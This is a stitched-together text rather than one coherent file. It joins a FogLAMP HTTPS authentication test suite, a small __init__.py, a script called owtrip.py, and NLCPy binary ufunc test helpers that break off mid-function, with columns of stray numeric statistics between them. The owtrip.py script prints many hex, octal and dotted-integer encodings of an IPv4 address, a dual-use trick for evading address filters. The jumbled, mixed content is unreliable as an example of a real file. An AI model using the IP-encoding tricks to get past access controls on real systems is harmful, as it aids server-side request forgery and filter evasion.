assert 200 == r.status
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/ping")
r = conn.getresponse()
assert 403 == r.status
assert "Forbidden" == r.reason
@pytest.mark.parametrize(("query", "expected_values"), [
('', {'users': [{'userId': 1, 'roleId': 1, 'userName': 'admin'},
{'userId': 2, 'roleId': 2, 'userName': 'user'}]}),
('?id=2', {'userId': 2, 'roleId': 2, 'userName': 'user'}),
('?username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
('?id=1&username=admin', {'userId': 1, 'roleId': 1, 'userName': 'admin'}),
])
def test_get_users(self, query, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/user{}".format(query), headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
def test_get_roles(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", "/foglamp/user/role", headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'roles': [{'description': 'All CRUD privileges', 'id': 1, 'name': 'admin'},
{'description': 'All CRUD operations and self profile management',
'id': 2, 'name': 'user'}]} == jdoc
@pytest.mark.parametrize(("form_data", "expected_values"), [
({"username": "any1", "password": "User@123"}, {'user': {'userName': 'any1', 'userId': 3, 'roleId': 2},
'message': 'User has been created successfully'}),
({"username": "admin1", "password": "F0gl@mp!", "role_id": 1},
{'user': {'userName': 'admin1', 'userId': 4, 'roleId': 1},
'message': 'User has been created successfully'}),
])
def test_create_user(self, form_data, expected_values):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("POST", "/foglamp/admin/user", body=json.dumps(form_data),
headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert expected_values == jdoc
def test_update_password(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", "/foglamp/user/any1/password", body=json.dumps({"current_password": "User@123",
"new_password": "F0gl@mp1"}),
headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'Password has been updated successfully for user id:<3>'} == jdoc
def test_reset_user(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", "/foglamp/admin/3/reset", body=json.dumps({"role_id": 1, "password": "F0gl@mp!"}),
headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': 'User with id:<3> has been updated successfully'} == jdoc
def test_delete_user(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("DELETE", "/foglamp/admin/4/delete", headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert {'message': "User has been deleted successfully"} == jdoc
def test_logout_all(self):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("PUT", '/foglamp/1/logout', headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert jdoc['logout']
def test_verify_logout(self, foglamp_url):
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
conn.request("GET", '/foglamp/asset', headers={"authorization": CERT_TOKEN})
r = conn.getresponse()
assert 401 == r.status
def test_admin_actions_forbidden_for_regular_user(self):
"""Test that regular user is not able to perform any actions that only an admin can"""
# Login with regular user
conn = http.client.HTTPSConnection("localhost", 1995, context=context)
cert_file_path = os.path.join(os.path.expandvars('${FOGLAMP_ROOT}'), 'data/etc/certs/user.cert')
with open(cert_file_path, 'r') as f:
conn.request("POST", "/foglamp/login", body=f)
r = conn.getresponse()
assert 200 == r.status
r = r.read().decode()
jdoc = json.loads(r)
assert not jdoc['admin']
_token = jdoc["token"]
# Create User
conn.request("POST", "/foglamp/admin/user", body=json.dumps({"username": "other",
"password": "User@123"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Reset User
conn.request("PUT", "/foglamp/admin/2/reset", body=json.dumps({"role_id": 1, "password": "F0gl@p!"}),
headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
# Delete User
conn.request("DELETE", "/foglamp/admin/2/delete", headers={"authorization": _token})
r = conn.getresponse()
assert 403 == r.status
r = r.read().decode()
assert "403: Forbidden" == r
@pytest.mark.skip(reason="Currently this feature is not implemented.")
def test_regular_user_access_to_admin_api_config(self, foglamp_url):
pass
| 44.995905
| 119
| 0.598107
| 12,737
| 109,880
| 5.025438
| 0.026851
| 0.03712
| 0.053243
| 0.066678
| 0.965802
| 0.962599
| 0.958725
| 0.954553
| 0.951444
| 0.945461
| 0
| 0.019705
| 0.255488
| 109,880
| 2,441
| 120
| 45.014338
| 0.762734
| 0.022015
| 0
| 0.912579
| 0
| 0.004371
| 0.214258
| 0.021715
| 0
| 0
| 0
| 0.00041
| 0.222924
| 1
| 0.081107
| false
| 0.121904
| 0.003885
| 0
| 0.089849
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
809cde0ab6c581086f6c095c097798905d022e84
| 87
|
py
|
Python
|
python_schema/__init__.py
|
Drachenfels/python-schema
|
6eda318127e196729dd1b1de35318c4af26fa12c
|
[
"MIT"
] | 1
|
2018-09-25T13:31:35.000Z
|
2018-09-25T13:31:35.000Z
|
python_schema/__init__.py
|
Drachenfels/python-schema
|
6eda318127e196729dd1b1de35318c4af26fa12c
|
[
"MIT"
] | 10
|
2018-12-04T16:09:42.000Z
|
2019-10-29T17:23:48.000Z
|
python_schema/__init__.py
|
Drachenfels/python-schema
|
6eda318127e196729dd1b1de35318c4af26fa12c
|
[
"MIT"
] | null | null | null |
from . import misc # NOQA
from . import exception # NOQA
from . import field # NOQA
| 21.75
| 31
| 0.689655
| 12
| 87
| 5
| 0.5
| 0.5
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.241379
| 87
| 3
| 32
| 29
| 0.909091
| 0.16092
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
80a86b12cdd0144a5c24a9e66d98139c767baa0d
| 4,775
|
py
|
Python
|
owtrip.py
|
mammamiiiya/turbo-adventure
|
a3ba12d29e105e19330676c0e95079af6123354b
|
[
"MIT"
] | null | null | null |
owtrip.py
|
mammamiiiya/turbo-adventure
|
a3ba12d29e105e19330676c0e95079af6123354b
|
[
"MIT"
] | null | null | null |
owtrip.py
|
mammamiiiya/turbo-adventure
|
a3ba12d29e105e19330676c0e95079af6123354b
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import argparse, re
def alternatives(ip):
print('Other ways to write {} are listed below:\n'.format(ip))
for octates in re.finditer(r'((?P<a>\d+)\.)((?P<b>\d+)\.)((?P<c>\d+)\.)(?P<d>\d+)', ip):
print(str(int(octates.group('a'))) + '.' + str(int(octates.group('b'))*256**2 + int(octates.group('c'))*256 + int(octates.group('d'))))
print(str(int(octates.group('a'))) + '.' + str(int(octates.group('b'))) + '.' + str(int(octates.group('c'))*256 + int(octates.group('d'))))
print(octates.group('a')+'.' + str(hex(int(octates.group('b'))))+'.' + str(hex(int(octates.group('c'))))+'.' + str(hex(int(octates.group('d')))))
print(octates.group('a')+'.'+octates.group('b')+'.' + str(hex(int(octates.group('c'))))+'.' + str(hex(int(octates.group('d')))))
print(octates.group('a')+'.'+octates.group('b')+'.' + octates.group('c')+'.'+str(hex(int(octates.group('d')))))
print(re.sub('o', '', octates.group('a')+'.' + str(oct(int(octates.group('b'))))+'.' + str(oct(int(octates.group('c'))))+'.' + str(oct(int(octates.group('d'))))))
print(re.sub('o', '', octates.group('a')+'.' + octates.group('b')+'.'+str(oct(int(octates.group('c'))))+'.' + str(oct(int(octates.group('d'))))))
print(re.sub('o', '', octates.group('a')+'.' + octates.group('b')+'.'+octates.group('c')+'.' + str(oct(int(octates.group('d'))))))
print(str(int(octates.group('a'))*256**3 + int(octates.group('b'))*256**2 + int(octates.group('c'))*256 + int(octates.group('d'))))
print(str(hex(int(octates.group('a'))*256**3 + int(octates.group('b'))*256**2 + int(octates.group('c'))*256 + int(octates.group('d')))))
print(str(hex(int(octates.group('a'))))+'.' + re.sub('o', '', str(oct(int(octates.group('b')))))+'.' + str(int(octates.group('c'))*256+int(octates.group('d'))))
print(str(hex(int(octates.group('a'))))+'.' + str(hex(int(octates.group('b'))))+'.' + str(hex(int(octates.group('c'))))+'.' + str(hex(int(octates.group('d')))))
print(str(hex(int(octates.group('a'))))+'.' + str(hex(int(octates.group('b'))))+'.' + str(hex(int(octates.group('c'))))+'.'+octates.group('d'))
print(str(hex(int(octates.group('a'))))+'.' + str(hex(int(octates.group('b'))))+'.' + octates.group('c')+'.'+octates.group('d'))
print(str(hex(int(octates.group('a'))))+'.' + octates.group('b')+'.'+octates.group('c')+'.'+octates.group('d'))
print(str(hex(int(octates.group('a'))))+'.' + str(hex(int(octates.group('b'))))+'.'+str(int(octates.group('c')) * 256+int(octates.group('d'))))
print(str(hex(int(octates.group('a'))))+'.' + str(int(octates.group('b'))*256**2+int(octates.group('c'))*256 + int(octates.group('d'))))
print(re.sub('x', 'x00000000', str(hex(int(octates.group('a'))))+'.' + str(hex(int(octates.group('b'))))+'.' + str(hex(int(octates.group('c'))))+'.' + str(hex(int(octates.group('d'))))))
print(re.sub('o', '', str(oct(int(octates.group('a')) * 256**3+int(octates.group('b'))*256**2 + int(octates.group('c'))*256 + int(octates.group('d'))))))
print(re.sub('o', '', str(oct(int(octates.group('a')))) + '.'+str(oct(int(octates.group('b'))))+'.' + str(oct(int(octates.group('c'))))+'.' + str(oct(int(octates.group('d'))))))
print(re.sub('o', '', str(oct(int(octates.group('a')))) + '.'+str(oct(int(octates.group('b'))))+'.' + str(oct(int(octates.group('c'))))+'.'+octates.group('d')))
print(re.sub('o', '', str(oct(int(octates.group('a')))) + '.'+str(oct(int(octates.group('b'))))+'.' + octates.group('c')+'.'+octates.group('d')))
print(re.sub('o', '', str(oct(int(octates.group('a')))) + '.'+octates.group('b')+'.'+octates.group('c')+'.'+octates.group('d')))
print(re.sub('o', '', str(oct(int(octates.group('a')))) + '.'+str(oct(int(octates.group('b')))))+'.' + str(int(octates.group('c'))*256+int(octates.group('d'))))
print(re.sub('o', '', str(oct(int(octates.group('a'))))) + '.'+str(int(octates.group('b'))*256**2+int(octates.group('c'))*256 + int(octates.group('d'))))
print(re.sub('o', '', str(oct(int(octates.group('a'))))) + '.'+str(hex(int(octates.group('b'))))+'.' + str(int(octates.group('c'))*256+int(octates.group('d'))))
print(re.sub('o', '0000000', str(oct(int(octates.group('a'))))+'.' + str(oct(int(octates.group('b'))))+'.' + str(oct(int(octates.group('c'))))+'.' + str(oct(int(octates.group('d'))))))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-i', dest='ip', help='Valid IPv4 Address (e.g. \'192.168.56.101\')')
args = parser.parse_args()
if args.ip:
alternatives(args.ip)
else:
parser.print_help()
| 68.214286
| 191
| 0.546178
| 700
| 4,775
| 3.71
| 0.092857
| 0.499037
| 0.485175
| 0.180208
| 0.882172
| 0.882172
| 0.882172
| 0.882172
| 0.879861
| 0.879861
| 0
| 0.023068
| 0.119372
| 4,775
| 69
| 192
| 69.202899
| 0.59453
| 0.004398
| 0
| 0
| 0
| 0.025641
| 0.069851
| 0.01094
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025641
| false
| 0
| 0.025641
| 0
| 0.051282
| 0.74359
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
80ceee5cd5d0f039f4197ac6d1faf09ae371ec4c
| 23,389
|
py
|
Python
|
nlcpy/testing/binary.py
|
SX-Aurora/nlcpy
|
0a53eec8778073bc48b12687b7ce37ab2bf2b7e0
|
[
"BSD-3-Clause"
] | 11
|
2020-07-31T02:21:55.000Z
|
2022-03-10T03:12:11.000Z
|
nlcpy/testing/binary.py
|
SX-Aurora/nlcpy
|
0a53eec8778073bc48b12687b7ce37ab2bf2b7e0
|
[
"BSD-3-Clause"
] | null | null | null |
nlcpy/testing/binary.py
|
SX-Aurora/nlcpy
|
0a53eec8778073bc48b12687b7ce37ab2bf2b7e0
|
[
"BSD-3-Clause"
] | null | null | null |
#
# * The source code in this file is developed independently by NEC Corporation.
#
# # NLCPy License #
#
# Copyright (c) 2020-2021 NEC Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither NEC Corporation nor the names of its contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import absolute_import
from __future__ import print_function
import numpy
import itertools
from nlcpy.testing import ufunc
def _recreate_array_or_scalar(op, in1, in2):
if op in ('divide', 'true_divide', 'remainder', 'mod', 'floor_divide'):
if isinstance(in2, numpy.ndarray):
in2[abs(in2) < 1] = 1
else:
in2 = 1 if abs(in2) < 1 else in2
elif op in ('power'):
if isinstance(in1, numpy.ndarray):
in1[in1 > 5] = 5
in1[in1 < -5] = -5
else:
in1 = 5 if in1.real > 5 else in1.real
in1 = -5 if in1.real < 5 else in1.real
if isinstance(in2, numpy.ndarray):
in2[in2 > 5] = 5
# TODO: valid minus value
in2[in2 <= 0] = 1
else:
in2 = 5 if in2.real > 5 else in2.real
# TODO: valid minus value
in2 = 1 if in2.real <= 0 else in2.real
elif op in ('right_shift', 'left_shift'):
if isinstance(in2, numpy.ndarray):
in2[in2 > 31] = 31
in2[in2 < 0] = 0
else:
in2 = 31 if in2.real > 31 else in2
in2 = 0 if in2.real < 0 else in2
elif op == 'ldexp':
if isinstance(in2, numpy.ndarray):
in2[in2 > 15] = 15
else:
in2 = 15 if in2.real > 15 else in2
return in1, in2
def _create_out_array(in1, in2, order, dtype, ufunc_name='', is_broadcast=False):
if ufunc_name == 'outer':
shape = numpy.asarray(in1).shape + numpy.asarray(in2).shape
else:
shape = numpy.broadcast(in1, in2).shape
# expand shape for broadcast
if is_broadcast:
shape = (2,) + shape
return numpy.zeros(shape, dtype=dtype, order=order)
def _check_binary_no_out_no_where_no_dtype(
self, args, kw, impl, name_xp, name_in1, name_in2, name_order, name_casting,
op, minval, maxval, shape, order_x, order_y, order_arg,
dtype_x, dtype_y, mode, ufunc_name, casting):
if mode == 'array_array':
param = itertools.product(
shape, order_x, order_y, dtype_x, dtype_y, order_arg, casting)
elif mode == 'array_scalar':
param = itertools.product(
shape, order_x, dtype_x, dtype_y, order_arg, casting)
elif mode == 'scalar_scalar':
param = itertools.product(dtype_x, dtype_y, casting)
else:
raise TypeError('unknown mode was detected.')
for p in param:
if mode == 'array_array':
shape1 = p[0][0]
shape2 = p[0][1]
order = p[5]
casting = p[6]
in1 = ufunc._create_random_array(shape1, p[1], p[3], minval, maxval)
in2 = ufunc._create_random_array(shape2, p[2], p[4], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
worst_dtype = ufunc._guess_worst_dtype((in1.dtype, in2.dtype))
elif mode == 'array_scalar':
shape1 = p[0][0]
order = p[4]
casting = p[5]
in1 = ufunc._create_random_array(shape1, p[1], p[2], minval, maxval)
in2 = ufunc._create_random_scalar(p[3], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
dt_in2 = numpy.dtype(p[3])
worst_dtype = ufunc._guess_worst_dtype((in1.dtype, dt_in2))
elif mode == 'scalar_scalar':
casting = p[2]
order = 'K'
in1 = ufunc._create_random_scalar(p[0], minval, maxval)
in2 = ufunc._create_random_scalar(p[1], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
dt_in1 = numpy.dtype(p[0])
dt_in2 = numpy.dtype(p[1])
worst_dtype = ufunc._guess_worst_dtype((dt_in1, dt_in2))
kw[name_in1] = in1
kw[name_in2] = in2
if ufunc_name == 'outer':
kw[name_order] = order
kw[name_casting] = casting
nlcpy_result, numpy_result = ufunc._precheck_func_for_ufunc(
self, args, kw, impl, name_xp, op, True, Exception)
# result check
if nlcpy_result is not None and numpy_result is not None:
for nlcpy_r, numpy_r in zip(nlcpy_result, numpy_result):
ufunc._check_ufunc_result(
op, worst_dtype, nlcpy_r, numpy_r, in1=in1, in2=in2)
def _check_binary_no_out_no_where_with_dtype(
self, args, kw, impl, name_xp, name_in1, name_in2, name_order, name_casting,
name_dtype, op, minval, maxval, shape, order_x, order_y, order_arg, dtype_x,
dtype_y, dtype_arg, mode, ufunc_name, casting):
if mode == 'array_array':
param = itertools.product(
shape, order_x, order_y, dtype_x, dtype_y, dtype_arg, order_arg, casting)
elif mode == 'array_scalar':
param = itertools.product(
shape, order_x, dtype_x, dtype_y, dtype_arg, order_arg, casting)
elif mode == 'scalar_scalar':
param = itertools.product(dtype_x, dtype_y, dtype_arg, casting)
else:
raise TypeError('unknown mode was detected.')
for p in param:
if mode == 'array_array':
shape1 = p[0][0]
shape2 = p[0][1]
order = p[6]
casting = p[7]
in1 = ufunc._create_random_array(shape1, p[1], p[3], minval, maxval)
in2 = ufunc._create_random_array(shape2, p[2], p[4], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
dtype = numpy.dtype(p[5])
worst_dtype = ufunc._guess_worst_dtype((in1.dtype, in2.dtype, dtype))
elif mode == 'array_scalar':
shape1 = p[0][0]
order = p[5]
casting = p[6]
in1 = ufunc._create_random_array(shape1, p[1], p[2], minval, maxval)
in2 = ufunc._create_random_scalar(p[3], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
dt_in2 = numpy.dtype(p[3])
dtype = numpy.dtype(p[4])
worst_dtype = ufunc._guess_worst_dtype((in1.dtype, dt_in2, dtype))
elif mode == 'scalar_scalar':
order = 'K'
casting = p[3]
in1 = ufunc._create_random_scalar(p[0], minval, maxval)
in2 = ufunc._create_random_scalar(p[1], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
dt_in1 = numpy.dtype(p[0])
dt_in2 = numpy.dtype(p[1])
dtype = numpy.dtype(p[2])
worst_dtype = ufunc._guess_worst_dtype((dt_in1, dt_in2, dtype))
kw[name_in1] = in1
kw[name_in2] = in2
kw[name_dtype] = dtype
if ufunc_name == 'outer':
kw[name_order] = order
kw[name_casting] = casting
nlcpy_result, numpy_result = ufunc._precheck_func_for_ufunc(
self, args, kw, impl, name_xp, op, True, Exception)
# result check
if nlcpy_result is not None and numpy_result is not None:
for nlcpy_r, numpy_r in zip(nlcpy_result, numpy_result):
ufunc._check_ufunc_result(
op, worst_dtype, nlcpy_r, numpy_r, in1=in1, in2=in2,
dtype=dtype)
def _check_binary_with_out_no_where_no_dtype(
self, args, kw, impl, name_xp, name_in1, name_in2, name_order, name_casting,
name_out, op, minval, maxval, shape, order_x, order_y, order_out, order_arg,
dtype_x, dtype_y, dtype_out, mode, is_broadcast, ufunc_name, casting):
if mode == 'array_array':
param = itertools.product(
shape, order_x, order_y, order_out,
dtype_x, dtype_y, dtype_out, order_arg, casting)
elif mode == 'array_scalar':
param = itertools.product(
shape, order_x, order_out, dtype_x,
dtype_y, dtype_out, order_arg, casting)
elif mode == 'scalar_scalar':
param = itertools.product(
order_out, dtype_x, dtype_y, dtype_out, casting)
else:
raise TypeError('unknown mode was detected.')
for p in param:
if mode == 'array_array':
shape1 = p[0][0]
shape2 = p[0][1]
order = p[7]
casting = p[8]
in1 = ufunc._create_random_array(shape1, p[1], p[4], minval, maxval)
in2 = ufunc._create_random_array(shape2, p[2], p[5], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
out = _create_out_array(in1, in2, p[3], p[6], ufunc_name, is_broadcast)
worst_dtype = ufunc._guess_worst_dtype((in1.dtype, in2.dtype, out.dtype))
elif mode == 'array_scalar':
shape1 = p[0][0]
order = p[6]
casting = p[7]
in1 = ufunc._create_random_array(shape1, p[1], p[3], minval, maxval)
in2 = ufunc._create_random_scalar(p[4], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
out = _create_out_array(in1, in2, p[2], p[5], ufunc_name, is_broadcast)
dt_in2 = numpy.dtype(p[4])
worst_dtype = ufunc._guess_worst_dtype((in1.dtype, dt_in2, out.dtype))
elif mode == 'scalar_scalar':
order = 'K'
casting = p[4]
in1 = ufunc._create_random_scalar(p[1], minval, maxval)
in2 = ufunc._create_random_scalar(p[2], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
out = _create_out_array(in1, in2, p[0], p[3], ufunc_name, is_broadcast)
dt_in1 = numpy.dtype(p[1])
dt_in2 = numpy.dtype(p[2])
worst_dtype = ufunc._guess_worst_dtype((dt_in1, dt_in2, out.dtype))
kw[name_in1] = in1
kw[name_in2] = in2
kw[name_out] = out
if ufunc_name == 'outer':
kw[name_order] = order
kw[name_casting] = casting
nlcpy_result, numpy_result = ufunc._precheck_func_for_ufunc(
self, args, kw, impl, name_xp, op, True, Exception)
# result check
if nlcpy_result is not None and numpy_result is not None:
for nlcpy_r, numpy_r in zip(nlcpy_result, numpy_result):
ufunc._check_ufunc_result(
op, worst_dtype, nlcpy_r, numpy_r, in1=in1, in2=in2,
out=out)
def _check_binary_with_out_no_where_with_dtype(
self, args, kw, impl, name_xp, name_in1, name_in2, name_order,
name_casting, name_out, name_dtype, op, minval, maxval, shape, order_x,
order_y, order_out, order_arg, dtype_x, dtype_y, dtype_out, dtype_arg,
mode, ufunc_name, casting):
if mode == 'array_array':
param = itertools.product(
shape, order_x, order_y, order_out, dtype_x, dtype_y,
dtype_out, dtype_arg, order_arg, casting)
elif mode == 'array_scalar':
param = itertools.product(
shape, order_x, order_out, dtype_x, dtype_y, dtype_out,
dtype_arg, order_arg, casting)
elif mode == 'scalar_scalar':
param = itertools.product(
order_out, dtype_x, dtype_y, dtype_out, dtype_arg, casting)
else:
raise TypeError('unknown mode was detected.')
for p in param:
if mode == 'array_array':
shape1 = p[0][0]
shape2 = p[0][1]
order = p[8]
casting = p[9]
in1 = ufunc._create_random_array(shape1, p[1], p[4], minval, maxval)
in2 = ufunc._create_random_array(shape2, p[2], p[5], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
out = _create_out_array(in1, in2, p[3], p[6], ufunc_name)
dtype = numpy.dtype(p[7])
worst_dtype = ufunc._guess_worst_dtype(
(in1.dtype, in2.dtype, out.dtype, dtype))
elif mode == 'array_scalar':
shape1 = p[0][0]
order = p[7]
casting = p[8]
in1 = ufunc._create_random_array(shape1, p[1], p[3], minval, maxval)
in2 = ufunc._create_random_scalar(p[4], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
out = _create_out_array(in1, in2, p[2], p[5], ufunc_name)
dt_in2 = numpy.dtype(p[4])
dtype = numpy.dtype(p[6])
worst_dtype = ufunc._guess_worst_dtype(
(in1.dtype, dt_in2, out.dtype, dtype))
elif mode == 'scalar_scalar':
order = 'K'
casting = p[5]
in1 = ufunc._create_random_scalar(p[1], minval, maxval)
in2 = ufunc._create_random_scalar(p[2], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
out = _create_out_array(in1, in2, p[0], p[3], ufunc_name)
dt_in1 = numpy.dtype(p[1])
dt_in2 = numpy.dtype(p[2])
dtype = numpy.dtype(p[4])
worst_dtype = ufunc._guess_worst_dtype(
(dt_in1, dt_in2, out.dtype, dtype))
kw[name_in1] = in1
kw[name_in2] = in2
kw[name_out] = out
kw[name_dtype] = dtype
if ufunc_name == 'outer':
kw[name_order] = order
kw[name_casting] = casting
nlcpy_result, numpy_result = ufunc._precheck_func_for_ufunc(
self, args, kw, impl, name_xp, op, True, Exception)
# result check
if nlcpy_result is not None and numpy_result is not None:
for nlcpy_r, numpy_r in zip(nlcpy_result, numpy_result):
ufunc._check_ufunc_result(
op,
worst_dtype,
nlcpy_r,
numpy_r,
in1=in1,
in2=in2,
out=out,
dtype=dtype)
def _check_binary_with_out_with_where_no_dtype(
self,
args,
kw,
impl,
name_xp,
name_in1,
name_in2,
name_order,
name_casting,
name_out,
name_where,
op,
minval,
maxval,
shape,
order_x,
order_y,
order_out,
order_where,
order_arg,
dtype_x,
dtype_y,
dtype_out,
mode,
is_broadcast,
ufunc_name,
casting):
if mode == 'array_array':
param = itertools.product(
shape, order_x, order_y, order_out, order_where,
dtype_x, dtype_y, dtype_out, order_arg, casting)
elif mode == 'array_scalar':
param = itertools.product(
shape, order_x, order_out, order_where, dtype_x,
dtype_y, dtype_out, order_arg, casting)
elif mode == 'scalar_scalar':
param = itertools.product(
order_out, order_where, dtype_x, dtype_y, dtype_out, casting)
else:
raise TypeError('unknown mode was detected.')
for p in param:
if mode == 'array_array':
shape1 = p[0][0]
shape2 = p[0][1]
order = p[8]
casting = p[9]
in1 = ufunc._create_random_array(shape1, p[1], p[5], minval, maxval)
in2 = ufunc._create_random_array(shape2, p[2], p[6], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
out = _create_out_array(in1, in2, p[3], p[7], ufunc_name, is_broadcast)
where = ufunc._create_random_array(
out.shape, p[4], ufunc.DT_BOOL, minval, maxval)
worst_dtype = ufunc._guess_worst_dtype(
(in1.dtype, in2.dtype, out.dtype))
elif mode == 'array_scalar':
shape1 = p[0][0]
order = p[7]
casting = p[8]
in1 = ufunc._create_random_array(shape1, p[1], p[4], minval, maxval)
in2 = ufunc._create_random_scalar(p[5], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
out = _create_out_array(in1, in2, p[2], p[6], ufunc_name, is_broadcast)
where = ufunc._create_random_array(
out.shape, p[3], ufunc.DT_BOOL, minval, maxval)
dt_in2 = numpy.dtype(p[5])
worst_dtype = ufunc._guess_worst_dtype(
(in1.dtype, dt_in2, out.dtype))
elif mode == 'scalar_scalar':
order = 'K'
casting = p[5]
in1 = ufunc._create_random_scalar(p[2], minval, maxval)
in2 = ufunc._create_random_scalar(p[3], minval, maxval)
in1, in2 = _recreate_array_or_scalar(op, in1, in2)
out = _create_out_array(in1, in2, p[0], p[4], ufunc_name, is_broadcast)
where = ufunc._create_random_array(
out.shape, p[1], ufunc.DT_BOOL, minval, maxval)
dt_in1 = numpy.dtype(p[2])
dt_in2 = numpy.dtype(p[3])
worst_dtype = ufunc._guess_worst_dtype(
(dt_in1, dt_in2, out.dtype))
# expand shape for broadcast
if is_broadcast:
where = numpy.resize(where, ((2,) + where.shape))
kw[name_in1] = in1
kw[name_in2] = in2
kw[name_out] = out
kw[name_where] = where
if ufunc_name == 'outer':
kw[name_order] = order
kw[name_casting] = casting
nlcpy_result, numpy_result = ufunc._precheck_func_for_ufunc(
self, args, kw, impl, name_xp, op, True, Exception)
# result check
if nlcpy_result is not None and numpy_result is not None:
for nlcpy_r, numpy_r in zip(nlcpy_result, numpy_result):
ufunc._check_ufunc_result(
op,
worst_dtype,
nlcpy_r,
numpy_r,
in1=in1,
in2=in2,
out=out,
where=where)
def _check_binary_with_out_with_where_with_dtype(
self, args, kw, impl, name_xp, name_in1, name_in2, name_order, name_casting,
name_out, name_where, name_dtype, op, minval, maxval, shape,
order_x, order_y, order_out, order_where, order_arg, dtype_x, dtype_y,
dtype_out, dtype_arg, mode, ufunc_name, casting):
if mode == 'array_array':
param = itertools.product(
shape, order_x, order_y, order_out, order_where,
dtype_x, dtype_y, dtype_out, dtype_arg, order_arg, casting)
